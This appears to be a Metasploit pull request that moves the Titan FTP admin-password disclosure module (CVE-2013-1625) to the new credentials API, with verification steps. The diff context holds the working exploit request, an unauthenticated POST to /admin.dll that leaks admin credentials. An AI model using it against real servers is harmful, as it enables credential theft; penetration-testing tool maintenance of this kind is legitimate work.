### PR TITLE
Update titan_ftp_admin_pwd to use the new creds API

### DIFF
--- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
+++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', '2013-1625' ],
+          [ 'CVE', '2013-1625' ]
         ]
     )
 
@@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary
   def run_host(ip)
     res = send_request_cgi(
       {
-        'uri'       => "/admin.dll",
+        'uri'       => '/admin.dll',
         'method'    => 'POST',
         'headers'   => {
           'SRT-WantXMLResponses' => 'true',
           'SRT-XMLRequest'       => 'true',
           'Authorization'        => 'Basic FAKEFAKE'
         },
-        'data'      => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
+        'data'      => '<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>'
       })
     return if not res
 
@@ -89,15 +89,39 @@ class Metasploit3 < Msf::Auxiliary
         print_good("#{ip}:#{datastore['RPORT']} - Base Directory: #{info[:basedir]}")
       end
       print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'")
-      report_auth_info(
-        :host       => ip,
-        :port       => datastore['RPORT'],
-        :user       => info[:username],
-        :pass       => info[:password],
-        :ptype      => "password",
-        :proto      => "http",
-        :sname      => "Titan FTP Admin Console"
+      report_cred(
+        ip: ip,
+        port: datastore['RPORT'],
+        user: info[:username],
+        password: info[:password],
+        service_name: 'ftp'
       )
     end
   end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
 end

--- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
+++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
       print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'")
       report_cred(
         ip: ip,
-        port: datastore['RPORT'],
+        port: 21,
         user: info[:username],
         password: info[:password],
         service_name: 'ftp'


### PR DESCRIPTION
This PR updates modules/auxiliary/scanner/http/titan_ftp_admin_pwd module to use the new creds API.

Verification
The vulnerable version of software is not available. The link on the https://github.com/rapid7/metasploit-framework/pull/1462 is also updated. Therefore, verification is done through the following steps.
- Start msfconsole
- Do: run irb
- Do: mod = framework.auxiliary.execute('scanner/http/titan_ftp_admin_pwd')<br/>
  mod.report_cred(ip: '1.1.1.1', port: 21, user: 'administrator', password: 'password', service_name: 'ftp'
- Do: exit irb
- Do: run creds command. You should see:

``` ruby
host     service        public              private       realm  private_type
----     -------        ------              -------       -----  ------------
1.1.1.1  21/tcp (ftp)   administrator       ftp-password         Password 
```
